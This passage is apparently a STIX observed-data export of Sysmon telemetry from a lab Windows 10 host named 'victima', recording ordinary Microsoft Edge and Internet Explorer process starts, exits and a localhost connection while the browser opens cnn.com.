| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2156", | |
| "--field-trial-handle=2180,i,15167668803209205671,16412517659772992776,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.62\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b0a-62e1-e701-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:18.783Z", | |
| "last_observed": "2022-07-27T14:26:18.783Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--ea1d5e91-705f-4a0d-9c8f-397bfccc4407", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.765Z", | |
| "modified": "2022-07-28T16:05:45.765Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:26.435339994Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:20.087Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:19.095Z", | |
| "last_observed": "2022-07-27T14:26:19.095Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0d36e915-5bb4-4f2b-a834-8f8087a8da2d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.765Z", | |
| "modified": "2022-07-28T16:05:45.765Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:28.461092175Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:22.137Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50169, | |
| "dst_ref": "6", | |
| "src_port": 50170, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:r2EUo9zo6frMauDV6CkgvhNvCvI=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:18.876Z", | |
| "last_observed": "2022-07-27T14:26:18.876Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4cebf14c-62f5-44ef-9796-81cdfd7a272b", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.766Z", | |
| "modified": "2022-07-28T16:05:45.766Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:28.462509714Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:22.137Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50169, | |
| "dst_ref": "6", | |
| "src_port": 50170, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:r2EUo9zo6frMauDV6CkgvhNvCvI=", | |
| "direction": "ingress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:18.876Z", | |
| "last_observed": "2022-07-27T14:26:18.876Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--f3fd6b0a-86f0-4357-88a0-55ba2a87610c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.767Z", | |
| "modified": "2022-07-28T16:05:45.767Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e801-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 6368, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.664547104Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.226Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e801-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.065Z", | |
| "last_observed": "2022-07-27T14:26:24.065Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--890abfe0-e6fd-42a2-9109-e1ddd8887b7c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.768Z", | |
| "modified": "2022-07-28T16:05:45.768Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "pid": 6368, | |
| "binary_ref": "3", | |
| "creator_user_ref": "9" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "4", | |
| "ingested": "2022-07-27T14:26:34.666054752Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:28.226Z", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "9" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b10-62e1-e801-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "<unknown process>" | |
| }, | |
| "4": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "5", | |
| "6" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "7" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "5": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "6": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "7": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "8": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "9": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.062Z", | |
| "last_observed": "2022-07-27T14:26:24.062Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--da791f32-30e4-4da5-9a6e-800882b4cfa2", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.768Z", | |
| "modified": "2022-07-28T16:05:45.768Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 3868, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.667946104Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.228Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.381Z", | |
| "last_observed": "2022-07-27T14:26:24.381Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b3005953-dec4-4d3e-adaf-ee641753e76b", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.769Z", | |
| "modified": "2022-07-28T16:05:45.769Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.114", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.62", | |
| "--initial-client-data=0x100,0x104,0x108,0xdc,0x19c,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b10-62e1-eb01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 5172, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=103.0.5060.114 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 \"--annotation=prod=Microsoft Edge\" --annotation=ver=103.0.1264.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x19c,0x7ffac1a5a0b8,0x7ffac1a5a0c8,0x7ffac1a5a0d8", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.669167632Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.228Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
